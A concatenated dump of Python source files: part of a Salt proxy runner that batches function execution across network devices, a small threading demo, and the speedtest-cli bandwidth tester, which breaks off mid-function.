salt_function
The name of the Salt function to invoke.
preload_grains: ``True``
Whether to preload the Grains before establishing the connection with
the remote network device.
default_grains:
Dictionary of the default Grains to make available within the functions
loaded.
with_grains: ``False``
Whether to load the Grains modules and collect Grains data and make it
available inside the Execution Functions.
The Grains will be loaded after opening the connection with the remote
network device.
preload_pillar: ``True``
Whether to preload Pillar data before opening the connection with the
remote network device.
default_pillar:
Dictionary of the default Pillar data to make it available within the
functions loaded.
with_pillar: ``True``
Whether to load the Pillar modules and compile Pillar data and make it
available inside the Execution Functions.
args
The list of arguments to send to the Salt function.
kwargs
Key-value arguments to send to the Salt function.
batch_size: ``10``
The size of each batch to execute.
static: ``False``
Whether to return the results synchronously (or return them as soon
as the device replies).
events: ``True``
Whether should push events on the Salt bus, similar to when executing
equivalent through the ``salt`` command.
use_cached_pillar: ``True``
Use cached Pillars whenever possible. If unable to gather cached data,
it falls back to compiling the Pillar.
use_cached_grains: ``True``
Use cached Grains whenever possible. If unable to gather cached data,
it falls back to collecting Grains.
cache_pillar: ``True``
Cache the compiled Pillar data before returning.
cache_grains: ``True``
Cache the collected Grains before returning.
use_existing_proxy: ``False``
Use the existing Proxy Minions when they are available (say on an
already running Master).
no_connect: ``False``
Don't attempt to initiate the connection with the remote device.
Default: ``False`` (it will initiate the connection).
test_ping: ``False``
When using the existing Proxy Minion with the ``use_existing_proxy``
option, can use this argument to verify also if the Minion is
responsive.
CLI Example:
.. code-block:: bash
salt-run proxy.execute "['172.17.17.1', '172.17.17.2']" test.ping driver=eos username=test password=test123
'''
resp = ''
retcode = 0
__pub_user = kwargs.get('__pub_user')
if not __pub_user:
__pub_user = __utils__['user.get_specific_user']()
kwargs = clean_kwargs(**kwargs)
if not jid:
if salt.version.__version_info__ >= (2018, 3, 0):
jid = salt.utils.jid.gen_jid(__opts__)
else:
jid = salt.utils.jid.gen_jid() # pylint: disable=no-value-for-parameter
event_args = list(args[:])
if kwargs:
event_kwargs = {'__kwarg__': True}
event_kwargs.update(kwargs)
event_args.append(event_kwargs)
if not returner_kwargs:
returner_kwargs = {}
opts = {
'with_grains': with_grains,
'with_pillar': with_pillar,
'preload_grains': preload_grains,
'preload_pillar': preload_pillar,
'default_grains': default_grains,
'default_pillar': default_pillar,
'preload_targeting': preload_targeting,
'invasive_targeting': invasive_targeting,
'args': args,
'cache_grains': cache_grains,
'cache_pillar': cache_pillar,
'use_cached_grains': use_cached_grains,
'use_cached_pillar': use_cached_pillar,
'use_existing_proxy': use_existing_proxy,
'no_connect': no_connect,
'test_ping': test_ping,
'tgt': tgt,
'tgt_type': tgt_type,
'failhard': failhard,
'timeout': timeout,
'returner': returner,
'returner_config': returner_config,
'returner_kwargs': returner_kwargs,
}
opts.update(kwargs)
if events:
__salt__['event.send'](
'proxy/runner/{jid}/new'.format(jid=jid),
{
'fun': salt_function,
'minions': minions,
'arg': event_args,
'jid': jid,
'tgt': tgt,
'tgt_type': tgt_type,
'user': __pub_user,
},
)
if not existing_minions:
existing_minions = []
down_minions = []
progress_bar = None
if progress and HAS_PROGRESSBAR:
progress_bar = progressbar.ProgressBar(
max_value=len(minions), enable_colors=True, redirect_stdout=True
)
ret_queue = multiprocessing.Queue()
if not static:
thread = threading.Thread(
target=_receive_replies_async, args=(ret_queue, progress_bar)
)
thread.daemon = True
thread.start()
else:
static_queue = multiprocessing.Queue()
thread = threading.Thread(
target=_receive_replies_sync, args=(ret_queue, static_queue, progress_bar)
)
thread.daemon = True
thread.start()
ret = {}
if '%' in str(batch_size):
percent = int(batch_size.replace('%', ''))
batch_size = len(minions) * percent / 100
batch_size = int(batch_size)
batch_count = int(len(minions) / batch_size) + (
1 if len(minions) % batch_size else 0
)
existing_batch_size = int(
math.ceil(len(existing_minions) * batch_size / float(len(minions)))
)
sproxy_batch_size = batch_size - existing_batch_size
sproxy_minions = list(set(minions) - set(existing_minions))
cli_batch = None
if existing_batch_size > 0:
# When there are existing Minions matching the target, use the native
# batching function to execute against these Minions.
log.debug('Executing against the existing Minions')
log.debug(existing_minions)
batch_opts = copy.deepcopy(__opts__)
batch_opts['batch'] = str(existing_batch_size)
batch_opts['tgt'] = existing_minions
batch_opts['tgt_type'] = 'list'
batch_opts['fun'] = salt_function
batch_opts['arg'] = event_args
batch_opts['batch_wait'] = batch_wait
batch_opts['selected_target_option'] = 'list'
batch_opts['return'] = returner
batch_opts['ret_config'] = returner_config
batch_opts['ret_kwargs'] = returner_kwargs
cli_batch = Batch(batch_opts, quiet=True)
log.debug('Batching detected the following Minions responsive')
log.debug(cli_batch.minions)
if cli_batch.down_minions:
log.warning(
'The following existing Minions connected to the Master '
'seem to be unresponsive: %s',
', '.join(cli_batch.down_minions),
)
down_minions = cli_batch.down_minions
for minion in down_minions:
ret_queue.put(
(
{minion: 'Minion did not return. [Not connected]'},
salt.defaults.exitcodes.EX_UNAVAILABLE,
)
)
log.info(
'%d devices matched the target, executing in %d batches',
len(minions),
batch_count,
)
batch_stop_queue = multiprocessing.Queue()
sproxy_stop_queue = multiprocessing.Queue()
# This dance with the batch_stop_queue and sproxy_stop_queue is necessary
# in order to make sure the execution stops at the same time (either at the
# very end, or when the iteration must be interrupted - e.g., due to
# failhard condition).
# sproxy_stop_queue signalises to the batch execution that the sproxy
# sequence is over (not under normal circumstances, but interrupted forcibly
# therefore it tells to the batch to stop immediately). In a similar way,
# batch_stop_queue is required at the very end to make sure we're sending
# the sentinel signaling at the very end for the display thread -- for
# example there can be situations when the sproxy execution may be empty as
# all the targets are existing proxies, so the display must wait.
if cli_batch:
existing_proxy_thread = threading.Thread(
target=_existing_proxy_cli_batch,
args=(cli_batch, ret_queue, batch_stop_queue, sproxy_stop_queue),
)
existing_proxy_thread.daemon = True
existing_proxy_thread.start()
else:
# If there's no batch to execute (i.e., no existing devices to run
# against), just need to signalise that there's no need to wait for this
# one to complete.
batch_stop_queue.put(0)
log.debug(
'Executing sproxy normal run on the following devices (%d batch size):',
sproxy_batch_size,
)
log.debug(sproxy_minions)
with multiprocessing.Manager() as manager:
# Put the sproxy execution details into a Queue, from where the
# processes from the bucket (see below) will pick them up whenever
# there's room for another process to start up.
sproxy_execute_queue = manager.Queue()
for minion_id in sproxy_minions:
device_opts = copy.deepcopy(opts)
if roster_targets and isinstance(roster_targets, dict):
device_opts['roster_opts'] = roster_targets.get(minion_id, {}).get(
'minion_opts'
)
sproxy_execute_queue.put((minion_id, device_opts))
timeout_devices = manager.list()
failed_devices = manager.list()
unreachable_devices = manager.list()
device_count = 0
sproxy_processes = []
stop_iteration = False
# In the sequence below, we'll have a process bucket with a maximum size
# which is the batch size, which will make room best efforts for
# processes to be started up whenever there's a new process finishing
# the task (or forcibly stopped due to timeout).
while not sproxy_execute_queue.empty() and not stop_iteration:
if len(sproxy_processes) >= sproxy_batch_size:
# Wait for the bucket to make room for another process.
time.sleep(0.02)
continue
minion_id, device_opts = sproxy_execute_queue.get()
log.debug('Starting execution for %s', minion_id)
device_proc = multiprocessing.Process(
target=_salt_call_and_return,
name=minion_id,
args=(
minion_id,
salt_function,
ret_queue,
unreachable_devices,
failed_devices,
event_args,
jid,
events,
),
kwargs=device_opts,
)
device_proc.start()
sproxy_processes.append(device_proc)
device_count += 0
processes = sproxy_processes[:]
for proc in processes:
if failhard and proc.exitcode:
stop_iteration = True
if not sproxy_execute_queue.empty() and len(processes) < min(
len(sproxy_minions), sproxy_batch_size
):
# Wait to fill up the sproxy processes bucket, and only then
# start evaluating.
# Why `min()`? It is possible that we can run on a smaller
# set of devices than the batch size.
continue
# Wait `timeout` seconds for the processes to execute.
proc.join(timeout=timeout)
if proc.is_alive():
# If the process didn't finish the task, it means it's past
# the timeout value, time to kiss it goodbye.
log.info(
'Terminating the process for %s, as it didn\'t reply within %d seconds',
proc._name,
timeout,
)
sproxy_processes.remove(proc)
if not hide_timeout:
ret_queue.put(
(
{proc._name: 'Minion did not return. [No response]'},
salt.defaults.exitcodes.EX_UNAVAILABLE,
)
)
# return code EX_UNAVAILABLE on process timeout?
retcode = max(retcode, salt.defaults.exitcodes.EX_UNAVAILABLE)
timeout_devices.append(proc._name)
if proc.exitcode and isinstance(proc.exitcode, int):
retcode = max(retcode, proc.exitcode)
# Terminate the process, making room for a new one.
proc.terminate()
if proc in sproxy_processes:
# proc may no longer be in sproxy_processes, if it has been
# already removed in the section above when exiting the loop
# forcibly.
sproxy_processes.remove(proc)
if stop_iteration:
log.error('Exiting as an error has occurred')
ret_queue.put((_SENTINEL, salt.defaults.exitcodes.EX_GENERIC))
sproxy_stop_queue.put(_SENTINEL)
for proc in sproxy_processes:
proc.terminate()
raise StopIteration
if len(processes) < min(len(sproxy_minions), sproxy_batch_size):
continue
if batch_wait:
log.debug(
'Waiting %f seconds before executing the next batch', batch_wait
)
time.sleep(batch_wait)
# Waiting for the existing proxy batch to finish.
while batch_stop_queue.empty():
time.sleep(0.02)
batch_retcode = batch_stop_queue.get()
retcode = max(retcode, batch_retcode)
# Prepare to quit.
ret_queue.put((_SENTINEL, 0))
# Wait a little to dequeue and print before throwing the progressbar,
# the summary, etc.
time.sleep(0.02)
if progress_bar:
progress_bar.finish()
if static:
resp = {}
while True:
ret, _retcode = static_queue.get()
retcode = max(retcode, _retcode)
if ret == _SENTINEL:
break
resp.update(ret)
if summary:
salt.utils.stringutils.print_cli('\n')
salt.utils.stringutils.print_cli(
'-------------------------------------------'
)
salt.utils.stringutils.print_cli('Summary')
salt.utils.stringutils.print_cli(
'-------------------------------------------'
)
salt.utils.stringutils.print_cli(
'# of devices targeted: {0}'.format(len(minions))
)
salt.utils.stringutils.print_cli(
'# of devices returned: {0}'.format(
len(minions) - len(timeout_devices) - len(unreachable_devices)
)
)
salt.utils.stringutils.print_cli(
'# of devices that did not return: {0}'.format(len(timeout_devices))
)
salt.utils.stringutils.print_cli(
'# of devices with errors: {0}'.format(len(failed_devices))
)
salt.utils.stringutils.print_cli(
'# of devices unreachable: {0}'.format(len(unreachable_devices))
)
if verbose:
if timeout_devices:
salt.utils.stringutils.print_cli(
(
'\nThe following devices didn\'t return (timeout):'
'\n - {0}'.format('\n - '.join(timeout_devices))
)
)
if failed_devices:
salt.utils.stringutils.print_cli(
(
'\nThe following devices returned "bad" output:'
'\n - {0}'.format('\n - '.join(failed_devices))
)
)
if unreachable_devices:
salt.utils.stringutils.print_cli(
(
'\nThe following devices are unreachable:'
'\n - {0}'.format('\n - '.join(unreachable_devices))
)
)
salt.utils.stringutils.print_cli(
'-------------------------------------------'
)
if events:
__salt__['event.send'](
'proxy/runner/{jid}/summary'.format(jid=jid),
{
'tgt': tgt,
'tgt_type': tgt_type,
'fun': salt_function,
'fun_args': event_args,
'jid': jid,
'user': __pub_user,
'retcode': retcode,
'matched_minions': minions,
'existing_minions': existing_minions,
'sproxy_minions': sproxy_minions,
'timeout_minions': list(timeout_devices),
'down_minions': list(down_minions),
'unreachable_devices': list(unreachable_devices),
'failed_minions': list(failed_devices),
},
)
__context__['retcode'] = retcode
if retcode != salt.defaults.exitcodes.EX_OK:
salt.utils.stringutils.print_cli(
'ERROR: Minions returned with non-zero exit code'
)
return resp
def execute(
tgt,
salt_function=None,
tgt_type='glob',
roster=None,
preview_target=False,
target_details=False,
timeout=60,
with_grains=True,
with_pillar=True,
preload_grains=True,
preload_pillar=True,
default_grains=None,
default_pillar=None,
args=(),
batch_size=10,
batch_wait=0,
static=False,
events=True,
cache_grains=True,
cache_pillar=True,
use_cached_grains=True,
use_cached_pillar=True,
use_existing_proxy=False,
no_connect=False,
test_ping=False,
target_cache=False,
target_cache_timeout=60,
preload_targeting=False,
invasive_targeting=False,
failhard=False,
summary=False,
verbose=False,
show_jid=False,
progress=False,
hide_timeout=False,
sync_roster=False,
sync_modules=False,
sync_grains=False,
sync_all=False,
returner='',
returner_config='',
returner_kwargs=None,
**kwargs
):
'''
Invoke a Salt function on the list of devices matched by the Roster
subsystem.
tgt
The target expression, e.g., ``*`` for all devices, or ``host1,host2``
for a list, etc. The ``tgt_list`` argument must be used accordingly,
depending on the type of this expression.
salt_function
The name of the Salt function to invoke.
tgt_type: ``glob``
The type of the ``tgt`` expression. Choose between: ``glob`` (default),
``list``, ``pcre``, ``rage``, or ``nodegroup``.
roster: ``None``
The name of the Roster to generate the targets. Alternatively, you can
specify the name of the Roster by configuring the ``proxy_roster``
option into the Master config.
preview_target: ``False``
Return the list of Roster targets matched by the ``tgt`` and
``tgt_type`` arguments.
preload_grains: ``True``
Whether to preload the Grains before establishing the connection with
the remote network device.
default_grains:
Dictionary of the default Grains to make available within the functions
loaded.
with_grains: ``True``
Whether to load the Grains modules and collect Grains data and make it
available inside the Execution Functions.
The Grains will be loaded after opening the connection with the remote
network device.
default_pillar:
Dictionary of the default Pillar data to make it available within the
functions loaded.
with_pillar: ``True``
Whether to load the Pillar modules and compile Pillar data and make it
available inside the Execution Functions.
arg
The list of arguments to send to the Salt function.
kwargs
Key-value arguments to send to the Salt function.
batch_size: ``10``
The size of each batch to execute.
static: ``False``
Whether to return the results synchronously (or return them as soon
as the device replies).
events: ``True``
Whether should push events on the Salt bus, similar to when executing
equivalent through the ``salt`` command.
use_cached_pillar: ``True``
Use cached Pillars whenever possible. If unable to gather cached data,
it falls back to compiling the Pillar.
use_cached_grains: ``True``
Use cached Grains whenever possible. If unable to gather cached data,
it falls back to collecting Grains.
cache_pillar: ``True``
Cache the compiled Pillar data before returning.
cache_grains: ``True``
Cache the collected Grains before returning.
use_existing_proxy: ``False``
Use the existing Proxy Minions when they are available (say on an
already running Master).
no_connect: ``False``
Don't attempt to initiate the connection with the remote device.
Default: ``False`` (it will initiate the connection).
test_ping: ``False``
When using the existing Proxy Minion with the ``use_existing_proxy``
option, can use this argument to verify also if the Minion is
responsive.
target_cache: ``True``
Whether to use the cached target matching results.
target_cache_timeout: 60
The duration to cache the target results for (in seconds).
CLI Example:
.. code-block:: bash
salt-run proxy.execute_roster edge* test.ping
salt-run proxy.execute_roster junos-edges test.ping tgt_type=nodegroup
'''
targets = []
rtargets = None
roster = roster or __opts__.get('proxy_roster', __opts__.get('roster'))
saltenv = __opts__.get('saltenv', 'base')
if sync_roster and not sync_all:
__salt__['saltutil.sync_roster'](saltenv=saltenv)
if sync_modules and not sync_all:
__salt__['saltutil.sync_modules'](saltenv=saltenv)
if sync_all:
__salt__['saltutil.sync_all'](saltenv=saltenv)
if not timeout:
log.warning('Timeout set as 0, will wait for the devices to reply indefinitely')
# Setting the timeout as None, because that's the value we need to pass
# to multiprocessing's join() method to wait for the devices to reply
# indefinitely.
timeout = None
if preload_targeting or invasive_targeting:
_tgt = '*'
_tgt_type = 'glob'
else:
_tgt = tgt
_tgt_type = tgt_type
existing_minions = []
if not roster or roster == 'None':
log.info(
'No Roster specified. Please use the ``roster`` argument, or set the ``proxy_roster`` option in the '
'Master configuration.'
)
targets = []
if use_existing_proxy:
# When targeting exiting Proxies, we're going to look and match the
# accepted keys
log.debug('Requested to match the target based on the existing Minions')
target_util = salt.utils.master.MasterPillarUtil(
tgt,
tgt_type,
use_cached_grains=True,
grains_fallback=False,
opts=__opts__,
)
targets = target_util._tgt_to_list()
existing_minions = targets[:]
else:
# Try a fuzzy match based on the exact target the user requested
# only when not attempting to match an existing Proxy. If you do
# want however, it won't be of much use, as the command is going to
# be spread out to non-existing minions, so better turn off that
# feature.
log.debug('Trying a fuzzy match on the target')
if tgt_type == 'list':
targets = tgt[:]
elif tgt_type == 'glob' and tgt != '*':
targets = [tgt]
else:
targets = None
if target_cache and not (invasive_targeting or preload_targeting):
cache_bank = salt.cache.factory(__opts__)
cache_key = hashlib.sha1(
'{tgt}_{tgt_type}'.format(tgt=tgt, tgt_type=tgt_type).encode()
).hexdigest()
cache_time_key = '{}_time'.format(cache_key)
cache_time = cache_bank.fetch('_salt_sproxy_target', cache_time_key)
if cache_time and time.time() - cache_time <= target_cache_timeout:
log.debug('Loading the targets from the cache')
targets = cache_bank.fetch('_salt_sproxy_target', cache_key)
if not targets:
rtargets = {}
if use_existing_proxy:
log.debug('Gathering the cached Grains from the existing Minions')
cached_grains = __salt__['cache.grains'](tgt=tgt, tgt_type=tgt_type)
for target, target_grains in cached_grains.items():
rtargets[target] = {'minion_opts': {'grains': target_grains}}
existing_minions.append(target)
log.debug('Computing the target using the %s Roster', roster)
__opts__['use_cached_grains'] = use_cached_grains
__opts__['use_cached_pillar'] = use_cached_pillar
roster_modules = salt.loader.roster(
__opts__, runner=__salt__, whitelist=[roster]
)
if '.targets' not in roster:
roster = '{mod}.targets'.format(mod=roster)
rtargets_roster = roster_modules[roster](_tgt, tgt_type=_tgt_type)
rtargets = salt.utils.dictupdate.merge(rtargets, rtargets_roster)
targets = list(rtargets.keys())
if target_cache and not (invasive_targeting or preload_targeting):
cache_bank.store('_salt_sproxy_target', cache_key, targets)
cache_bank.store('_salt_sproxy_target', cache_time_key, time.time())
if preload_targeting or invasive_targeting:
log.debug(
'Loaded everything from the Roster, to start collecting Grains and Pillars:'
)
else:
log.debug(
'The target expression "%s" (%s) matched the following:', str(tgt), tgt_type
)
log.debug(targets)
if not targets:
return 'No devices matched your target. Please review your tgt / tgt_type arguments, or the Roster data source'
if preview_target:
return targets
elif not salt_function:
return 'Please specify a Salt function to execute.'
jid = kwargs.get('__pub_jid')
if not jid:
if salt.version.__version_info__ >= (2018, 3, 0):
jid = salt.utils.jid.gen_jid(__opts__)
else:
jid = salt.utils.jid.gen_jid() # pylint: disable=no-value-for-parameter
if verbose or show_jid:
salt.utils.stringutils.print_cli('Executing job with jid {0}'.format(jid))
salt.utils.stringutils.print_cli(
'-------------------------------------------\n'
)
if events:
__salt__['event.send'](jid, {'minions': targets})
return execute_devices(
targets,
salt_function,
tgt=tgt,
tgt_type=tgt_type,
with_grains=with_grains,
preload_grains=preload_grains,
with_pillar=with_pillar,
preload_pillar=preload_pillar,
default_grains=default_grains,
default_pillar=default_pillar,
args=args,
batch_size=batch_size,
batch_wait=batch_wait,
static=static,
events=events,
cache_grains=cache_grains,
cache_pillar=cache_pillar,
use_cached_grains=use_cached_grains,
use_cached_pillar=use_cached_pillar,
use_existing_proxy=use_existing_proxy,
existing_minions=existing_minions,
no_connect=no_connect,
roster_targets=rtargets,
test_ping=test_ping,
preload_targeting=preload_targeting,
invasive_targeting=invasive_targeting,
failhard=failhard,
timeout=timeout,
summary=summary,
verbose=verbose,
progress=progress,
hide_timeout=hide_timeout,
returner=returner,
returner_config=returner_config,
returner_kwargs=returner_kwargs,
**kwargs
)
|
example2.py
|
#!/usr/bin/env python
import threading
import time
def worker():
print('new worker')
time.sleep(0.5)
print('end of worker')
t0 = threading.Thread(target = worker)
t1 = threading.Thread()
t0.daemon = t1.daemon = True
t1.run = worker
print('before')
t0.start()
time.sleep(0.1)
t1.start()
print('after')
|
speedtest.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.3.1'
# Some global variables we use
source = None
shutdown_event = None
import os
import re
import sys
import math
import signal
import socket
import timeit
import threading
from datetime import datetime
# Used for bound_interface
socket_socket = socket.socket
try:
import xml.etree.cElementTree as ET
except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1))
* math.cos(math.radians(lat2)) * math.sin(dlon / 2)
* math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
f = urlopen(self.url)
while 1 and not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
f = urlopen(self.url, self.data)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
uh = urlopen('http://www.speedtest.net/speedtest-config.php')
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError:
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
uh = urlopen('http://www.speedtest.net/speedtest-servers-static.php')
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError:
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
print_('Failed to parse list of speedtest.net servers')
sys.exit(1)
servers = {}
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']), float(client['lon'])],
[float(attrib.get('lat')), float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
start = timeit.default_timer()
h.request("GET", urlparts[2])
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
output = "%s" % (datetime.now().strftime('%Y/%m/%d, %H:%M'))
#print output
global shutdown_event, source
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('bytes', 1), default=('bits', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
